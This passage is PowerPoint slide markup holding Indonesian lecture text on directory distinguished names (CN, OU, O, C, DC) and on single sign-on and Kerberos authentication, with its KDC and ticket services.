              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut-nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicantumkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berurutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>induk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CN), unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (OU), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (O), negara (C), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain (DC).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, nama yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Widget di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Inggris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>CN=WIDGETWEB, OU=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemasaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, O=Widget, C=UK, DC=widget, DC=foo</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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9084187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Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Masuk Tunggal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SSO) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Active Directory (AD) Microsoft. Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anjing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Hades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkepala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Cerberus) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Klien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara-pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (KDC)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KDC: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
